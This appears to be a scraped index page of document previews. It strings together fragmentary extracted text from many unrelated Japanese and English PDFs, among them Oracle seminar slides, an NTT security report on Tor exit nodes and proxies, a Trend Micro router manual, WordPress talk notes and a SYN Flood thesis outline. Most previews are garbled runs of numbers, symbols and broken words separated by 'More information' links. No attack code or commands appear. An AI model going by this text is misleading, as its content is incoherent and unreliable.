Copyright 2004 Copyright 2004 Copyright 2004 2 . Copyright 2004 3 . Copyright 2004 4 Copyright 2004 5 (1) (2) (3) (4) Copyright 2004 6 ISO/IEC17799 127 JRMS Copyright 2004 7 Copyright 2004 8 Copyright 2004 9 Copyright

More information

untitled

untitled Oracle Direct Seminar !? Oracle Database 11g - - Agenda Copyright 2009, Oracle. All rights reserved. 2 Agenda Copyright 2009, Oracle. All

More information

SOC Report

SOC Report 多段プロキシによる Tor の Exit ノードの隠蔽について N T T コ ミ ュ ニ ケ ー シ ョ ン ズ株式会社 経営企画部 マネージドセキュリティサービス推進室 セ キ ュ リ テ ィ オ ペ レ ー シ ョ ン担当 2013 年 03 月 15 日 Ver. 1.0 1. 調査概要... 3 1.1. 調査概要... 3 2. 注意事項... 3 3. 検証結果... 3 3.1. 検証環境...

More information

untitled

untitled Grapecity -.NET with GrapeCity - ActiveReports Creation Date: Nov. 30, 2005 Last Update: Nov. 30, 2005 Version: 1.0 Grapecity Microsoft Visual Studio.NET VB.NET Oracle Tips ActiveReports ActiveReports.NET

More information

82801pdf.pqxp

82801pdf.pqxp PC Contents Chapter 1 PC / Chapter 2/ 1 2 SMS WAN BITS Chapter 3 SMS 2003 SMS SMS SMS 2003 2 6 8 9 9 10 11 12 13 14 16 17 17 18 19 19 20 20 21 22 24 24 25 25 26 26 27 28 PC PC PC PC PC IT 1 1 PC PC PC

More information

untitled

untitled IBM i 2010 BAO DB2 Web Query Power Systems 2010 IBM Corporation 1. DB2 Web Query DB2 Web Query 2. BAO BAO Business Analytics & Optimization IBM i BAO 3. DB2 Web Query DB2 Web Query 2 2010 IBM Corporation

More information

1. 2. SRT100 3. QAC/TM 4. QAC/TM 5. QAC/TM 6. QAC/TM ( ) 7. [APPENDIX 1] [APPENDIX 2] QAC/TM Classification 2

1. 2. SRT100 3. QAC/TM 4. QAC/TM 5. QAC/TM 6. QAC/TM ( ) 7. [APPENDIX 1] [APPENDIX 2] QAC/TM Classification 2 SRT100 QAC/TM (Rev.10.00.49 ) 2010 1 Copyright (C) 2010 Trend Micro Incorporated. All rights reserved. TRENDMICRO 1. 2. SRT100 3. QAC/TM 4. QAC/TM 5. QAC/TM 6. QAC/TM ( ) 7. [APPENDIX 1] [APPENDIX 2] QAC/TM

More information

ORCA (Online Research Control system Architecture)

ORCA (Online Research Control system Architecture) ORCA (Online Research Control system Architecture) ORCA Editor Ver.1.2 1 9 10 ORCA EDITOR 10 10 10 Java 10 11 ORCA Editor Setup 11 ORCA Editor 12 15 15 ORCA EDITOR 16 16 16 16 17 17 ORCA EDITOR 18 ORCA

More information

untitled

untitled ALTIRIS RECOVERY SOLUTION 6.2(Server-based Mode) Quick Startup Guide Rev. 1.1 2007 10 18 1.... 2 1.1 RECOVERY SOLUTION SERVER... 2 1.2 RECOVERY AGENT... 3 2.... 4 2.1... 4 2.2 RECOVERY SOLUTION... 5 2.3

More information

2016 IP 1 1 1 1.1............................................. 1 1.2.............................................. 1 1.3............................................. 1 1.4.............................................

More information

76

76 ! # % & % & %& %& " $ 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 % & &! & $ & " & $ & # & ' 91 92 $ % $'%! %(% " %(% # &)% & 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 !$!$ "% "%

More information

†ı25”Y„o-PDF.ren

†ı25”Y„o-PDF.ren 12,000 10,000 8,000 6,000 4,000 2,000 0 1998 1999 2000 2001 2002 2003 2004 1,200 1,000 800 600 400 200 0 1998 1999 2000 2001 2002 2003 2004 $ "! ''" '' ''$ ''% ''& '''! " ' & % $ "! ''" ' '$ '% '& ''!

More information

honbun.indd

honbun.indd Development of Web Reservation System for Sirakaba Lodge in Aichi University (1) Object-Oriented Modeling and Implementation of Database Application Yong Jiang, Satoru Horii and Yasuhiro Taga Faculty of

More information

DEIM Forum 2019 H2-2 SuperSQL SuperSQL SQL SuperSQL Web SuperSQL DBMS Pi

DEIM Forum 2019 H2-2 SuperSQL SuperSQL SQL SuperSQL Web SuperSQL DBMS Pi DEIM Forum 2019 H2-2 SuperSQL 223 8522 3 14 1 E-mail: {terui,goto}@db.ics.keio.ac.jp, toyama@ics.keio.ac.jp SuperSQL SQL SuperSQL Web SuperSQL DBMS PipelineDB SuperSQL Web Web 1 SQL SuperSQL HTML SuperSQL

More information

FileMaker Instant Web Publishing Guide

FileMaker Instant Web Publishing Guide FileMaker 11 Web 2004-2010 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento FileMaker, Inc. Bento FileMaker, Inc. FileMaker FileMaker,

More information

main.dvi

main.dvi Central Authentication and Authorization Service Web Application (Hisashi NAITO) Graduate School of Mathematics, Nagoya University naito@math.nagoya-u.ac.jp (Shoji KAJITA) Information Technology Center,

More information

p64大倉.pdf

p64大倉.pdf Web Web 1 17 GP 19 2 GP 2 18 GP 17 Web 17 2007 18 4 2. 1 1 GP OK 2 3 4GP 5 2. 2 1 4 2 3 2. 3 1 2GP 3 2. 4 19 GP GP GP PC GP or or Web 2007 1 3 1 LAN 2 CDDVD 3 3 3. 1 17 18 19 50 3. 2 2 3. 3 Web 4 2 2 3.

More information

PowerPoint プレゼンテーション

PowerPoint プレゼンテーション LSI Web Copyright 2005 e-trees.japan, Inc. all rights reserved. 2000 Web Web 300 Copyright 2005 e-trees.japan, Inc. all rights reserved. 2 LSI LSI ASIC Application Specific IC LSI 1 FPGA Field Programmable

More information

Epson Print Admin

Epson Print Admin Epson Print Admin NPD5368-02 JA Epson Print Admin Epson Print Admin Epson Print Admin Epson Print Admin Epson Open Platform Epson Open Platform Epson Print Admin Epson Print Admin Epson Print Admin Epson

More information

Adobe AIR のセキュリティ

Adobe AIR のセキュリティ ADOBE AIR http://help.adobe.com/ja_jp/legalnotices/index.html iii................................................................. 1.....................................................................

More information

FileMaker 15 ODBC と JDBC ガイド

FileMaker 15 ODBC と JDBC ガイド FileMaker 15 ODBC JDBC 2004-2016 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc. FileMaker WebDirect FileMaker,

More information

WordPress Ktai Style Ktai Entry 18 Mac 18

WordPress Ktai Style Ktai Entry 18 Mac 18 WORDPRESS 2011 8 27 (8 31 ) WordBeach Nagoya WordBench WordPress Ktai Style Ktai Entry 18 Mac 18 http://www.yuriko.net/ @lilyfanjp PHP WordPress ( ) WordPress function the_content($more_link_text=null,$stripteaser=0,

More information

WIDE 1

WIDE 1 WIDE 1 2 Web Web Web Web Web Web Web Web Web Web? Web Web Things to cover Web Web Web Web Caching Proxy 3 Things NOT covered / How to execute Perl Scripts as CGI binaries on Windows NT How to avoid access

More information

etrust Access Control etrust Access Control UNIX(Linux, Windows) 2

etrust Access Control   etrust Access Control UNIX(Linux, Windows) 2 etrust Access Control etrust Access Control UNIX(Linux, Windows) 2 etrust Access Control etrust Access Control 3 ID 10 ID SU ID root 4 OS OS 2 aaa 3 5 TCP/IP outgoing incoming DMZ 6 OS setuid/setgid) OS

More information

Testing XML Performance

Testing XML Performance - DataPower Technology, Inc. XML Web 2003 5 DATAPOWER XML WEB - Copyright 2003DataPower Technology, Inc. All Rights Reserved. DataPower Technology, Inc. DataPower DataPower ( ) DataPower 2003 5 2/17 DATAPOWER

More information

Oracle Fail Safe For Windows NT and Windows 2000 リリース・ノート、リリース 3.1.2

Oracle Fail Safe For Windows NT and Windows 2000 リリース・ノート、リリース 3.1.2 Oracle Fail Safe for Windows NT and Windows 2000 3.1.2 2001 7 : J04372-01 Oracle Applications 11i Oracle E-Business Suite 11i Oracle Oracle Oracle Corporation JInitiator Oracle7 Oracle8 Oracle8i Oracle

More information

IW2002-B5 1 Internet Week ( ) 9:30 12:30 ( ) Copyright 2002 All Rights Reserved, by Seiji Kumagai ADSL FTTH 24 IP LAN

IW2002-B5 1 Internet Week ( ) 9:30 12:30 ( ) Copyright 2002 All Rights Reserved, by Seiji Kumagai ADSL FTTH 24 IP LAN 1 Internet Week 2002 20021218() 9:3012:30 () kuma@isid.co.jp ADSLFTTH 24 IP LAN LAN LAN 2 1 ? 3? 4 e-japan 20053000 20051000 2 IP»» 5 CATV DSL FTTH LAN 6 620(20029) CATV 180DSL 422FTTH 12 14 3 MP3CD CM

More information

2004 SYN/ACK SYN Flood G01P014-6

2004 SYN/ACK SYN Flood G01P014-6 2004 SYN/ACK SYN Flood 2005 2 2 1G01P014-6 1 5 1.1...................................... 5 1.2...................................... 5 1.3..................................... 6 2 7 2.1..................................

More information

nopcommerce 2.2 2.1.6 Adobe Flash ( 1 ) 1 nopcommerce 2.2 ( [5, p.3-4] )

nopcommerce 2.2 2.1.6 Adobe Flash ( 1 ) 1 nopcommerce 2.2 ( [5, p.3-4] ) nopcommerce 2.2 NopCommerce (Ver.2.3) NopCommerce 2.1.1 (OS) Windows 7 Windows Vista Windows XP Windows Server 2003 Windows Server 2008 2.1.2 Web Internet Information Service (IIS) 6.0 2.1.3 ASP.NET 4.0

More information